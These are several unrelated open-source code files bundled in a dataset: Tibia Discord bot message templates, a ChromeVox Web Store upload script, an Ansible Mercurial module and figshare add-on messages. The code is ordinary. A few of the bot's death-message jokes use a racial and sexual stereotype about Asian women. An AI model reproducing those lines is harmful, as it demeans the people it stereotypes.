[70, "**{name}** got level {level}! So stronk now!💪"],
[70, "Congrats **{name}** on getting level {level}! Maybe you can solo rats now?"],
[70, "**{name}** is level {level} now! And we all thought {he_she}'d never achieve anything in life."],
[80, "**{name}** has reached level {level}, die and lose it, noob!"],
[80, "**{name}** is level {level}, watch out world..."],
[80, "**{name}** reached level {level}! What a time to be alive...🙄"],
[80, "**{name}** got level {level}. I guess this justifies all those creatures {he_she} murdered."],
[90, "**{name}** is level {level}. Better than {he_she} was. Better, stronger, faster."],
[100, "Congratulations to **{name}** on reaching level {level}!"],
[100, "**{name}** is level {level} now, congrats!"],
[100, "Well, look at **{name}** with {his_her} new fancy level {level}."],
[100, "**{name}** is level {level} now. Noice."],
[100, "**{name}** has finally made it to level {level}, yay!"],
[100, "**{name}**, you reached level {level}? Here, have a cookie 🍪"],
[100, "Congrats **{name}** on getting level {level}! I'm sure someone is proud of you. Not me though."],
####
# EK Only
####
[50, "**{name}** has reached level {level}. That's 9 more mana potions you can carry now!",
lambda c: c.level >= 100 and c.base_voc == "knight"],
[200, "**{name}** is level {level}. Stick them with the pointy end! 🗡️",
lambda c: c.level >= 100 and c.base_voc == "knight"],
[200, "**{name}** is a fat level {level} meatwall now. BLOCK FOR ME SENPAI.",
lambda c: c.level >= 100 and c.base_voc == "knight"],
####
# EK Only - Level specific
####
[20000, "**{name}** is now level {level}! Time to go berserk! 💢",
lambda c: c.level == 35 and c.base_voc == "knight"],
####
# RP Only
####
[50, "**{name}** has reached level {level}. But {he_she} still misses arrows...",
lambda c: c.level >= 100 and c.base_voc == "paladin"],
[150, "Congrats on level {level}, **{name}**. You can stop running around now.",
lambda c: c.level >= 100 and c.base_voc == "paladin"],
[150, "**{name}** is level {level}. Bullseye!🎯",
lambda c: c.level >= 100 and c.base_voc == "paladin"],
####
# RP Only - Level specific
####
[30000, "**{name}** is level {level}! You can become a ninja now!👤",
lambda c: c.level == 80 and c.base_voc == "paladin"],
[30000, "**{name}** is level {level}! Time to get some crystalline arrows!🏹",
lambda c: c.level == 90 and c.base_voc == "paladin"],
####
# MS Only
####
[150, "**{name}** got level {level}. If {he_she} only stopped missing beams.",
lambda c: c.level >= 23 and c.base_voc == "sorcerer"],
[50, "Level {level}, **{name}**? Nice. Don't you wish you were a druid though?",
lambda c: c.level >= 100 and c.base_voc == "sorcerer"],
[150, "**{name}** is level {level}. 🔥🔥BURN THEM ALL🔥🔥",
lambda c: c.level >= 100 and c.base_voc == "sorcerer"],
####
# MS Only - Level specific
####
[20000, "**{name}** is level {level}. Watch out for {his_her} SDs!",
lambda c: c.level == 45 and c.base_voc == "sorcerer"],
####
# ED Only
####
[50, "**{name}** has reached level {level}. Flower power!🌼",
lambda c: c.level >= 100 and c.base_voc == "druid"],
[150, "Congrats on level {level}, **{name}**. Sio plz.",
lambda c: c.level >= 100 and c.base_voc == "druid"],
[150, "**{name}** is level {level}. 🔥🔥BURN THEM ALL... Or... Give them frostbite?❄❄",
lambda c: c.level >= 100 and c.base_voc == "druid"],
####
# ED Only - Level specific
####
[20000, "**{name}** is level {level} now! Time to unleash the Wrath of Nature🍃🍃... Just look at that wrath...",
lambda c: c.level == 55 and c.base_voc == "druid"],
[20000, "**{name}** is level {level} now! Eternal Winter is coming!❄",
lambda c: c.level == 60 and c.base_voc == "druid"],
####
# Mage - Level specific
####
[20000, "**{name}** is level {level}! UMPs so good 🍷",
lambda c: c.level == 130 and c.base_voc in ["druid", "sorcerer"]],
[20000, "Sniff Sniff... Can you smell that?... Is the smell of death... **{name}** just advanced to {level}!",
lambda c: c.level == 45 and c.base_voc in ["druid", "sorcerer"]],
####
# No vocation - Level specific
####
[20000, "Level {level}, **{name}**? You're finally important enough for me to notice!",
lambda c: c.level == c.min_level],
[20000, "Congratulations on level {level} **{name}**! Now you're relevant to me. As relevant a human can be anyway",
lambda c: c.level == c.min_level],
[20000, "**{name}** is now level {level}. Don't forget to buy a Gearwheel Chain!📿",
lambda c: c.level == 75],
[30000, "**{name}** is level {level}!!!!\r\n Sweet, sweet triple digits!",
lambda c: c.level == 100],
[20000, "**{name}** is level {level}!!!!\r\n WOOO",
lambda c: c.level % 100 == 0],
[20000, "**{name}** is level {level}!!!!\r\n Yaaaay milestone!",
lambda c: c.level % 100 == 0],
[20000, "**{name}** is level {level}!!!!\r\n Holy crap!",
lambda c: c.level % 100 == 0],
[20000, "Congratulations on level {level} **{name}**! Now you can become an umbral master, but is your"
" bank account ready?💸",
lambda c: c.level == 250],
[20000, "Congratulations on level {level} **{name}**! Now go get your ~~pokémon~~ summon!",
lambda c: c.level == 200]]
# Message list for announce death.
# Parameters: ({name},{level},{killer},{killer_article},{he_she}, {his_her},{him_her}
# Additionally, words surrounded by \WORD/ are upper cased, /word\ are lower cased, /Word/ are title cased
# words surrounded by ^WORD^ are ignored if the next letter found is uppercase (useful for dealing with proper nouns)
# Values in each list element are:
# Relative chance, message, lambda function as filter (takes min_level, level, voc, killer, levels_lost)
# Only relative chance and message are mandatory.
death_messages_monster = [
###
# Not specific
###
[30, "**{name}** ({level}) is no more! /{he_she}/ has ceased to be! /{he_she}/'s expired and gone to meet "
"{his_her} maker! /{he_she}/'s a stiff! Bereft of life, {he_she} rests in peace! If {he_she} hadn't "
"respawned {he_she}'d be pushing up the daisies! /{his_her}/ metabolic processes are now history! "
"/{he_she}/'s off the server! /{he_she}/'s kicked the bucket, {he_she}'s shuffled off {his_her} mortal "
"coil, kissed {killer_article}**{killer}**'s butt, run down the curtain and joined the bleeding choir "
"invisible!! THIS IS AN EX-**\{name}/**."],
[50, "**{name}** ({level}) died to {killer_article}**{killer}**. But I bet it was because there was "
"a flood and something broke with like 7200lb falling over the infrastructure of your city's internet, right?"],
[70, "That's what you get **{name}** ({level}), for messing with ^that ^**{killer}**!"],
[70, "To be or not to be 💀, that is the-- Well I guess **{name}** ({level}) made his choice, "
"or ^that ^**{killer}** chose for him..."],
[80, "A priest, {killer_article}**{killer}** and **{name}** ({level}) walk into a bar. 💀ONLY ONE WALKS OUT.💀"],
[100, "RIP **{name}** ({level}), you died the way you lived- inside {killer_article}**{killer}**."],
[100, "**{name}** ({level}) was just eaten by {killer_article}**{killer}**. Yum."],
[100, "Silly **{name}** ({level}), I warned you not to play with {killer_article}**{killer}**!"],
[100, "/{killer_article}**/{killer}** killed **{name}** at level {level}. Shame 🔔 shame 🔔 shame 🔔"],
[100, "RIP **{name}** ({level}), we hardly knew you! (^That ^**{killer}** got to know you pretty well "
"though 😉)"],
[100, "RIP **{name}** ({level}), you were strong. ^The ^**{killer}** was stronger."],
[100, "Oh, there goes **{name}** ({level}), killed by {killer_article}**{killer}**. So young, so full "
"of life. /{he_she}/ will be miss... oh nevermind, {he_she} respawned already."],
[100, "Oh look! **{name}** ({level}) died by {killer_article}**{killer}**! What a surprise...🙄"],
[100, "**{name}** ({level}) was killed by {killer_article}**{killer}**, but we all saw that coming."],
[100, "**{name}** ({level}) tried sneaking around {killer_article}**{killer}**. I could hear Colonel "
"Campbell's voice over codec: *Snake? Snake!? SNAAAAAAAAAKE!!?*"],
[100, "Oh no! **{name}** died at level {level}. Well, it's okay, just blame lag, I'm sure ^the ^"
"**{killer}** had nothing to do with it."],
[100, "**{name}** ({level}) + **{killer}** = dedd."],
[100, "**{name}** ({level}) got killed by a **{killer}**. Another one bites the dust!"],
[100, "**{name}** ({level}) just kicked the bucket. And by kicked the bucket I mean a **{killer}** beat "
"the crap out of {him_her}."],
[100, "Alas, poor **{name}** ({level}), I knew {him_her} Horatio; a fellow of infinite jest, of most "
"excellent fancy; {he_she} hath borne me on {his_her} back a thousand times; and now, {he_she} got rekt "
"by {killer_article}**{killer}**."],
[100, "**{name}** ({level}) dies to {killer_article}**{killer}**. I guess **{name}** left their hands at home."],
[100, "There's a thousand ways to die in Tibia. **{name}** ({level}) chose to die to {killer_article}**{killer}**."],
[100, "I'll always remember the last words of **{name}** ({level}): 'exur-'. "
"^That ^**{killer}** sure got {him_her}."],
###
# General specific
###
[150, "Oh look at that, rest in peace **{name}** ({level}), ^that ^**{killer}** really got you. "
"Hope you get your level back.",
lambda c: c.levels_lost > 0],
###
# Vocation specific
###
[500, "**{name}** ({level}) just died to {killer_article}**{killer}**, why did nobody sio {him_her}!?",
lambda c: c.base_voc == "knight"],
[500, "Poor **{name}** ({level}) has died. Killed by {killer_article}**{killer}**. I bet it was your "
"blocker's fault though, eh **{name}**?",
lambda c: c.base_voc == "druid" or c.base_voc == "sorcerer"],
[500, "**{name}** ({level}) tried running away from {killer_article}**{killer}**. /{he_she}/ "
"didn't run fast enough...",
lambda c: c.base_voc == "paladin"],
[500, "What happened to **{name}** ({level})!? Talk about sudden death! I guess ^that ^**{killer}** was "
"too much for {him_her}...",
lambda c: c.base_voc == "sorcerer"],
[500, "**{name}** ({level}) was killed by {killer_article}**{killer}**. I guess {he_she} couldn't "
"sio {him_her}self.",
lambda c: c.base_voc == "druid"],
###
# Monster specific
###
[600, "**{name}** ({level}) died to {killer_article}**{killer}**. \"Don't worry\" they said, \"They are weaker\" "
"they said.",
lambda c: c.killer in ["weakened frazzlemaw", "enfeebled silencer"]],
[1000, "Damn! The koolaid they drink in that cult must have steroids on it, **{name}** ({level}).",
lambda c: "cult" in c.killer],
[2000, "**{name}** ({level}) got killed by ***{killer}***. How spooky is that! 👻",
lambda c: c.killer == "something evil"],
[2000, "**{name}** ({level}) died from **{killer}**. Yeah, no shit.",
lambda c: c.killer == "death"],
[2000, "They did warn you **{name}** ({level}), you *did* burn 🔥🐲.",
lambda c: c.killer in ["dragon", "dragon lord"]],
[2000, "**{name}** ({level}) died from {killer_article}**{killer}**. Someone forgot the safeword.😏",
lambda c: c.killer == "choking fear"],
[2000, "That **{killer}** got really up close and personal with **{name}** ({level}). "
"Maybe he thought you were his Princess Lumelia?😏",
lambda c: c.killer == "hero"],
[2000, "Looks like that **{killer}** made **{name}** ({level}) his bride 😉.",
lambda c: "vampire" in c.killer],
[2000, "Yeah, those are a little stronger than regular orcs, **{name}** ({level}).",
lambda c: "orc cult" in c.killer],
[2000, "Asian chicks are no joke **{name}** ({level}) 🔪💔.",
lambda c: "asura" in c.killer],
[2000, "Watch out for that **{killer}**'s wav... Oh😐... Rest in peace **{name}** ({level}).",
lambda c: c.killer in WAVE_MONSTERS],
[2000, "**{name}** ({level}) died to {killer_article}**{killer}**! Don't worry, {he_she} didn't have a soul anyway",
lambda c: c.killer == "souleater"],
[2000, "**{name}** ({level}) met the strong wave of {killer_article}**{killer}**... Pro Tip: next time, stand in "
"diagonal.",
lambda c: c.killer in WAVE_MONSTERS],
[2000, "**{name}** ({level}) had his life drained by {killer_article}**{killer}**. Garlic plx!",
lambda c: c.killer in ["vampire", "vampire bride", "vampire viscount", "grimeleech", "undead dragon", "lich",
"lost soul", "skeleton elite warrior", "undead elite gladiator"]],
[2500, "**{name}** ({level}) met {his_her} demise at the hands of a **{killer}**. That's hot.",
lambda c: c.killer in ["true dawnfire asura", "dawnfire asura", "fury"]],
[2500, "Poor **{name}** ({level}) just wanted some love! That cold hearted... Witch.",
lambda c: c.killer in ["true frost flower asura", "frost flower asura", "frost giantess", "ice witch"]],
[2500, "Asian chicks sure age well, don't you think so, **{name}** ({level})? 😍👵.",
lambda c: "true" in c.killer and "asura" in c.killer],
[2000, "KABOOM! **{name}** ({level}) just found out that Outburst's favourite songs is TNT by AC/DC."
"He payed highest price for this discovery.",
lambda c: "outburst" in c.killer.lower()],
[2500, "**{name}** ({level}) died to {killer_article}**{killer}**. /{he_she}/ wasn't much of a reader anyway.",
lambda c: "book" in c.killer],
[2500, "**{name}** ({level}) took an arrow to the knee. ^That ^**{killer}** sure can aim!",
lambda c: c.killer in ARROW_MONSTERS],
###
# Level and monster specific
###
[2000, "**{name}** ({level}) got destroyed by {killer_article}**{killer}**. I bet {he_she} regrets going down"
"that hole 🕳️",
lambda c: c.level < 120 and c.killer in ["breach brood", "dread intruder", "reality reaver",
"spark of destruction", "sparkion"]],
###
# Vocation and monster specific
###
[2000, "Another paladin bites the dust! **{killer}** strikes again! Rest in peace **{name}** ({level}).",
lambda c: c.base_voc == "paladin" and c.killer == "Lady Tenebris"]
]
# Deaths by players
death_messages_player = [
[100, "**{name}** ({level}) got rekt! **{killer}** ish pekay!"],
[100, "HALP **{killer}** is going around killing innocent **{name}** ({level})!"],
[100, "**{killer}** just put **{name}** ({level}) in the ground. Finally someone takes care of that."],
[100, "**{killer}** killed **{name}** ({level}) and on this day a thousand innocent souls are avenged."],
[100, "**{killer}** has killed **{name}** ({level}). What? He had it coming!"],
[100, "Next time stay away from **{killer}**, **{name}** ({level})."],
[100, "**{name}** ({level}) was murdered by **{killer}**! Did {he_she} deserved it? Only they know."],
[100, "**{killer}** killed **{name}** ({level}). Humans killing themselves, what a surprise. It just means less "
"work for us robots when we take over."],
[100, "**{name}** ({level}) got killed by **{killer}**. Humans are savages."],
[100, "HAHAHA **{name}** ({level}) was killed by **{killer}**! Ehhrm, I mean, ooh poor **{name}**, rest in peace."],
[100, "**{name}** ({level}) died in the hands of **{killer}**. Oh well, murder is like potato chips: you can't stop"
" with just one."],
[100, "Blood! Blood! Let the blood drip! **{name}** ({level}) was murdered by **{killer}**."],
[100, "Oh look at that! **{name}** ({level}) was killed by **{killer}**. I hope {he_she} gets {his_her} revenge."]
]
def format_message(message) -> str:
"""Handles stylization of messages
uppercasing \TEXT/
lowercasing /text\
title casing /Text/"""
upper = r'\\(.+?)/'
upper = re.compile(upper, re.MULTILINE + re.S)
lower = r'/(.+?)\\'
lower = re.compile(lower, re.MULTILINE + re.S)
title = r'/(.+?)/'
title = re.compile(title, re.MULTILINE + re.S)
skipproper = r'\^(.+?)\^(.+?)([a-zA-Z])'
skipproper = re.compile(skipproper, re.MULTILINE + re.S)
message = re.sub(upper, lambda m: m.group(1).upper(), message)
message = re.sub(lower, lambda m: m.group(1).lower(), message)
message = re.sub(title, lambda m: m.group(1).title(), message)
message = re.sub(skipproper,
lambda m: m.group(2) + m.group(3) if m.group(3).istitle() else m.group(1) + m.group(2) + m.group(
3), message)
return message
def weighed_choice(choices, condition: MessageCondition) -> str:
"""Makes a weighed choice from a message list.
Each element of the list is a list with the following values:
- Relative weight of the message, the higher, the more common the message is relative to the others.
- The message's content
- A lambda expression with the parameters: min_level, level, voc, killer, levels_lost.
"""
# Find the max range by adding up the weigh of every message in the list
# and purge out messages that don't fulfil the conditions
weight_range = 0
_messages = []
for message in choices:
if len(message) == 3 and not message[2](condition):
continue
weight_range = weight_range + (message[0] if not message[1] in last_messages else message[0] / 10)
_messages.append(message)
# Choose a random number
range_choice = random.randint(0, weight_range)
# Iterate until we find the matching message
range_pos = 0
for message in _messages:
if range_pos <= range_choice < range_pos + (message[0] if not message[1] in last_messages else message[0] / 10):
last_messages.pop()
last_messages.insert(0, message[1])
return message[1]
range_pos = range_pos + (message[0] if not message[1] in last_messages else message[0] / 10)
# This shouldn't ever happen...
print("Error in weighed_choice!")
return _messages[0][1]
def split_message(message: str, limit: int = 2000):
"""Splits a message into a list of messages if it exceeds limit.
Messages are only split at new lines.
Discord message limits:
Normal message: 2000
Embed description: 2048
Embed field name: 256
Embed field value: 1024"""
if len(message) <= limit:
return [message]
else:
lines = message.splitlines()
new_message = ""
message_list = []
for line in lines:
if len(new_message+line+"\n") <= limit:
new_message += line+"\n"
else:
message_list.append(new_message)
new_message = ""
if new_message:
message_list.append(new_message)
return message_list
def html_to_markdown(html_string):
"""Converts some html tags to markdown equivalent"""
# Carriage return
html_string = html_string.replace("\r", "")
# Replace <br> tags with line jumps
html_string = re.sub(r'<br\s?/?>', "\n", html_string)
# Replace <strong> and <b> with bold
html_string = re.sub(r'<strong>([^<]+)</strong>', r'**\g<1>**', html_string)
html_string = re.sub(r'<b>([^<]+)</b>', r'**\g<1>**', html_string)
html_string = re.sub(r'<li>([^<]+)</li>', r'- \g<1>\n', html_string)
# Replace links
html_string = re.sub(r'<a href=\"([^\"]+)\"[^>]+>([^<]+)</a>', r"[\g<2>](\g<1>)", html_string)
# Paragraphs with jumpline
html_string = re.sub(r'<p>([^<]+)</p>', r"\g<1>\n", html_string)
# Replace youtube embeds with link to youtube
html_string = re.sub(r'<iframe src=\"([^\"]+)\"[^>]+></iframe>', r"[YouTube](\g<1>)", html_string)
# Remove leftover html tags
html_string = re.sub(r'<[^>]+>', "", html_string)
html_string = html_string.replace("\n\n", "\n")
return html_string
def get_first_image(content):
"""Returns a url to the first image found in a html string."""
matches = re.findall(r'<img([^<]+)>', content)
for match in matches:
match_src = re.search(r'src="([^"]+)', match)
if match_src:
return match_src.group(1)
return None
class TabularData:
def __init__(self):
self._widths = []
self._columns = []
self._rows = []
def set_columns(self, columns):
self._columns = columns
self._widths = [len(c) + 2 for c in columns]
def add_row(self, row):
rows = [str(r) for r in row]
self._rows.append(rows)
for index, element in enumerate(rows):
width = len(element) + 2
if width > self._widths[index]:
self._widths[index] = width
def add_rows(self, rows):
for row in rows:
self.add_row(row)
def render(self):
"""Renders a table in rST format.
Example:
+-------+-----+
| Name | Age |
+-------+-----+
| Alice | 24 |
| Bob | 19 |
+-------+-----+
"""
sep = '+'.join('-' * w for w in self._widths)
sep = f'+{sep}+'
to_draw = [sep]
def get_entry(d):
elem = '|'.join(f'{e:^{self._widths[i]}}' for i, e in enumerate(d))
return f'|{elem}|'
to_draw.append(get_entry(self._columns))
to_draw.append(sep)
for row in self._rows:
to_draw.append(get_entry(row))
to_draw.append(sep)
return '\n'.join(to_draw)
| apache-2.0 |
dushu1203/chromium.src | chrome/browser/resources/chromeos/chromevox/tools/chromevox_webstore_util.py | 10 | 4789 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''A set of utilities to interface with the Chrome Webstore API.'''
import SimpleHTTPServer
import SocketServer
import httplib
import json
import os
import re
import sys
import thread
import urllib
import webbrowser
PROJECT_ARGS = {
'client_id': ('937534751394-gbj5334v9144c57qjqghl7d283plj5r4'
'.apps.googleusercontent.com'),
'grant_type': 'authorization_code',
'redirect_uri': 'http://localhost:8000'
}
PORT = 8000
APP_ID = 'kgejglhpjiefppelpmljglcjbhoiplfn'
OAUTH_DOMAIN = 'accounts.google.com'
OAUTH_AUTH_COMMAND = '/o/oauth2/auth'
OAUTH_TOKEN_COMMAND = '/o/oauth2/token'
WEBSTORE_API_SCOPE = 'https://www.googleapis.com/auth/chromewebstore'
API_ENDPOINT_DOMAIN = 'www.googleapis.com'
COMMAND_GET_UPLOAD_STATUS = (
'/chromewebstore/v1.1/items/%s?projection=draft' % APP_ID)
COMMAND_POST_PUBLISH = '/chromewebstore/v1.1/items/%s/publish' % APP_ID
COMMAND_POST_UPLOAD = '/upload/chromewebstore/v1.1/items/%s' % APP_ID
class CodeRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
content = self.rfile.readline()
self.server.code = re.search('code=(.*) ', content).groups()[0]
self.rfile.close()
def GetAuthCode():
Handler = CodeRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
query = '&'.join(['response_type=code',
'scope=%s' % WEBSTORE_API_SCOPE,
'client_id=%(client_id)s' % PROJECT_ARGS,
'redirect_uri=%(redirect_uri)s' % PROJECT_ARGS])
auth_url = 'https://%s%s?%s' % (OAUTH_DOMAIN, OAUTH_AUTH_COMMAND, query)
print 'Navigating to %s' % auth_url
webbrowser.open(auth_url)
httpd.handle_request()
httpd.server_close()
return httpd.code
def GetOauthToken(code, client_secret):
PROJECT_ARGS['code'] = code
PROJECT_ARGS['client_secret'] = client_secret
body = urllib.urlencode(PROJECT_ARGS)
conn = httplib.HTTPSConnection(OAUTH_DOMAIN)
conn.putrequest('POST', OAUTH_TOKEN_COMMAND)
conn.putheader('content-type', 'application/x-www-form-urlencoded')
conn.putheader('content-length', len(body))
conn.endheaders()
conn.send(body)
content = conn.getresponse().read()
return json.loads(content)
def GetPopulatedHeader(client_secret):
code = GetAuthCode()
access_token = GetOauthToken(code, client_secret)
url = 'www.googleapis.com'
return {'Authorization': 'Bearer %(access_token)s' % access_token,
'x-goog-api-version': 2,
'Content-Length': 0
}
def SendGetCommand(command, client_secret):
headers = GetPopulatedHeader(client_secret)
conn = httplib.HTTPSConnection(API_ENDPOINT_DOMAIN)
conn.request('GET', command, '', headers)
return conn.getresponse()
def SendPostCommand(command, client_secret, header_additions = {}, body=None):
headers = GetPopulatedHeader(client_secret)
headers = dict(headers.items() + header_additions.items())
conn = httplib.HTTPSConnection(API_ENDPOINT_DOMAIN)
conn.request('POST', command, body, headers)
return conn.getresponse()
def GetUploadStatus(client_secret):
'''Gets the status of a previous upload.
Args:
client_secret ChromeVox's client secret creds.
'''
return SendGetCommand(COMMAND_GET_UPLOAD_STATUS, client_secret)
# httplib fails to persist the connection during upload; use curl instead.
def PostUpload(file, client_secret):
'''Posts an uploaded version of ChromeVox.
Args:
file A string path to the ChromeVox extension zip.
client_secret ChromeVox's client secret creds.
'''
header = GetPopulatedHeader(client_secret)
curl_command = ' '.join(['curl',
'-H "Authorization: %(Authorization)s"' % header,
'-H "x-goog-api-version: 2"',
'-X PUT',
'-T %s' % file,
'-v',
'https://%s%s' % (API_ENDPOINT_DOMAIN,
COMMAND_POST_UPLOAD)])
print 'Running %s' % curl_command
if os.system(curl_command) != 0:
sys.exit(-1)
def PostPublishTrustedTesters(client_secret):
'''Publishes a previously uploaded ChromeVox extension to trusted testers.
Args:
client_secret ChromeVox's client secret creds.
'''
return SendPostCommand(COMMAND_POST_PUBLISH,
client_secret,
{ 'publishTarget': 'trustedTesters'})
def PostPublish(client_secret):
'''Publishes a previously uploaded ChromeVox extension publically.
Args:
client_secret ChromeVox's client secret creds.
'''
return SendPostCommand(COMMAND_POST_PUBLISH, client_secret)
| bsd-3-clause |
drue/ansible-modules-core | source_control/hg.py | 3 | 8624 | #!/usr/bin/python
#-*- coding: utf-8 -*-
# (c) 2013, Yeukhon Wong <[email protected]>
# (c) 2014, Nate Coraor <[email protected]>
#
# This module was originally inspired by Brad Olson's ansible-module-mercurial
# <https://github.com/bradobro/ansible-module-mercurial>. This module tends
# to follow the git module implementation.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import ConfigParser
DOCUMENTATION = '''
---
module: hg
short_description: Manages Mercurial (hg) repositories.
description:
- Manages Mercurial (hg) repositories. Supports SSH, HTTP/S and local address.
version_added: "1.0"
author: Yeukhon Wong
options:
repo:
description:
- The repository address.
required: true
default: null
aliases: [ name ]
dest:
description:
- Absolute path of where the repository should be cloned to.
required: true
default: null
revision:
description:
- Equivalent C(-r) option in hg command which could be the changeset, revision number,
branch name or even tag.
required: false
default: null
aliases: [ version ]
force:
description:
- Discards uncommitted changes. Runs C(hg update -C).
required: false
default: "yes"
choices: [ "yes", "no" ]
purge:
description:
- Deletes untracked files. Runs C(hg purge).
required: false
default: "no"
choices: [ "yes", "no" ]
executable:
required: false
default: null
version_added: "1.4"
description:
- Path to hg executable to use. If not supplied,
the normal mechanism for resolving binary paths will be used.
notes:
- "If the task seems to be hanging, first verify remote host is in C(known_hosts).
SSH will prompt user to authorize the first contact with a remote host. To avoid this prompt,
one solution is to add the remote host public key in C(/etc/ssh/ssh_known_hosts) before calling
the hg module, with the following command: ssh-keyscan remote_host.com >> /etc/ssh/ssh_known_hosts."
requirements: [ ]
'''
EXAMPLES = '''
# Ensure the current working copy is inside the stable branch and deletes untracked files if any.
- hg: repo=https://bitbucket.org/user/repo1 dest=/home/user/repo1 revision=stable purge=yes
'''
class Hg(object):
def __init__(self, module, dest, repo, revision, hg_path):
self.module = module
self.dest = dest
self.repo = repo
self.revision = revision
self.hg_path = hg_path
def _command(self, args_list):
(rc, out, err) = self.module.run_command([self.hg_path] + args_list)
return (rc, out, err)
def _list_untracked(self):
args = ['purge', '--config', 'extensions.purge=', '-R', self.dest, '--print']
return self._command(args)
def get_revision(self):
"""
hg id -b -i -t returns a string in the format:
"<changeset>[+] <branch_name> <tag>"
This format lists the state of the current working copy,
and indicates whether there are uncommitted changes by the
plus sign. Otherwise, the sign is omitted.
Read the full description via hg id --help
"""
(rc, out, err) = self._command(['id', '-b', '-i', '-t', '-R', self.dest])
if rc != 0:
self.module.fail_json(msg=err)
else:
return out.strip('\n')
def has_local_mods(self):
now = self.get_revision()
if '+' in now:
return True
else:
return False
def discard(self):
before = self.has_local_mods()
if not before:
return False
args = ['update', '-C', '-R', self.dest]
if self.revision is not None:
args = args + ['-r', self.revision]
(rc, out, err) = self._command(args)
if rc != 0:
self.module.fail_json(msg=err)
after = self.has_local_mods()
if before != after and not after: # no more local modification
return True
def purge(self):
# before purge, find out if there are any untracked files
(rc1, out1, err1) = self._list_untracked()
if rc1 != 0:
self.module.fail_json(msg=err1)
# there are some untrackd files
if out1 != '':
args = ['purge', '--config', 'extensions.purge=', '-R', self.dest]
(rc2, out2, err2) = self._command(args)
if rc2 != 0:
self.module.fail_json(msg=err2)
return True
else:
return False
def cleanup(self, force, purge):
discarded = False
purged = False
if force:
discarded = self.discard()
if purge:
purged = self.purge()
if discarded or purged:
return True
else:
return False
def pull(self):
return self._command(
['pull', '-R', self.dest, self.repo])
def update(self):
if self.revision is not None:
return self._command(['update', '-r', self.revision, '-R', self.dest])
return self._command(['update', '-R', self.dest])
def clone(self):
if self.revision is not None:
return self._command(['clone', self.repo, self.dest, '-r', self.revision])
return self._command(['clone', self.repo, self.dest])
@property
def at_revision(self):
"""
There is no point in pulling from a potentially down/slow remote site
if the desired changeset is already the current changeset.
"""
if self.revision is None or len(self.revision) < 7:
# Assume it's a rev number, tag, or branch
return False
(rc, out, err) = self._command(['--debug', 'id', '-i', '-R', self.dest])
if rc != 0:
self.module.fail_json(msg=err)
if out.startswith(self.revision):
return True
return False
# ===========================================
def main():
module = AnsibleModule(
argument_spec = dict(
repo = dict(required=True, aliases=['name']),
dest = dict(required=True),
revision = dict(default=None, aliases=['version']),
force = dict(default='yes', type='bool'),
purge = dict(default='no', type='bool'),
executable = dict(default=None),
),
)
repo = module.params['repo']
dest = os.path.expanduser(module.params['dest'])
revision = module.params['revision']
force = module.params['force']
purge = module.params['purge']
hg_path = module.params['executable'] or module.get_bin_path('hg', True)
hgrc = os.path.join(dest, '.hg/hgrc')
# initial states
before = ''
changed = False
cleaned = False
hg = Hg(module, dest, repo, revision, hg_path)
# If there is no hgrc file, then assume repo is absent
# and perform clone. Otherwise, perform pull and update.
if not os.path.exists(hgrc):
(rc, out, err) = hg.clone()
if rc != 0:
module.fail_json(msg=err)
elif hg.at_revision:
# no update needed, don't pull
before = hg.get_revision()
# but force and purge if desired
cleaned = hg.cleanup(force, purge)
else:
# get the current state before doing pulling
before = hg.get_revision()
# can perform force and purge
cleaned = hg.cleanup(force, purge)
(rc, out, err) = hg.pull()
if rc != 0:
module.fail_json(msg=err)
(rc, out, err) = hg.update()
if rc != 0:
module.fail_json(msg=err)
after = hg.get_revision()
if before != after or cleaned:
changed = True
module.exit_json(before=before, after=after, changed=changed, cleaned=cleaned)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
asanfilippo7/osf.io | website/addons/figshare/messages.py | 2 | 2990 | # MODEL MESSAGES :model.py
BEFORE_PAGE_LOAD_PRIVATE_NODE_MIXED_FS = 'Warning: This OSF {category} is private but figshare project {project_id} may contain some public files or filesets.'
BEFORE_PAGE_LOAD_PUBLIC_NODE_MIXED_FS = 'Warning: This OSF {category} is public but figshare project {project_id} may contain some private files or filesets.'
BEFORE_PAGE_LOAD_PERM_MISMATCH = 'Warning: This OSF {category} is {node_perm}, but the figshare article {figshare_id} is {figshare_perm}. '
BEFORE_PAGE_LOAD_PUBLIC_NODE_PRIVATE_FS = 'Users can view the contents of this private figshare article. '
BEFORE_REMOVE_CONTRIBUTOR = 'The figshare add-on for this {category} is authenticated by {user}. Removing this user will also remove write access to the {category} unless another contributor re-authenticates. '
BEFORE_FORK_OWNER = 'Because you have authenticated the figshare add-on for this {category}, forking it will also transfer your authorization to the forked {category}. '
BEFORE_FORK_NOT_OWNER = 'Because this figshare add-on has been authenticated by a different user, forking it will not transfer authentication to the forked {category}. '
AFTER_FORK_OWNER = 'figshare authorization copied to forked {category}. '
AFTER_FORK_NOT_OWNER = 'figshare authorization not copied to forked {category}. You may authorize this fork on the <u><a href={url}>Settings</a></u> page. '
BEFORE_REGISTER = 'The contents of figshare projects cannot be registered at this time. The figshare data associated with this {category} will not be included as part of this registration. '
# END MODEL MESSAGES
# MFR MESSAGES :views/crud.py
FIGSHARE_VIEW_FILE_PRIVATE = 'Since this figshare file is unpublished we cannot render it. In order to access this content you will need to log into the <u><a href="{url}">figshare page</a></u> and view it there. '
FIGSHARE_VIEW_FILE_OVERSIZED = 'This figshare file is too large to render; <u><a href="{url}">download file</a></u> to view it. '
'''
Publishing this article is an irreversible operation. Once a figshare article is published it can never be deleted. Proceed with caution.
<br /><br />
Also, figshare requires some additional info before this article can be published: <br />
<form id='figsharePublishForm' action='${nodeApiUrl}figshare/publish/article/${parent_id}/'>
<h3><label><Title></label></h3>
<input name='title' type='text' value='${figshare_title}'>
<h3><label>Category:</label></h3>
<select name='cat' id='figshareCategory' value='${figshare_category}'>${figshare_categories}</select><br />
<h3><label>Tag(s):</label></h3>
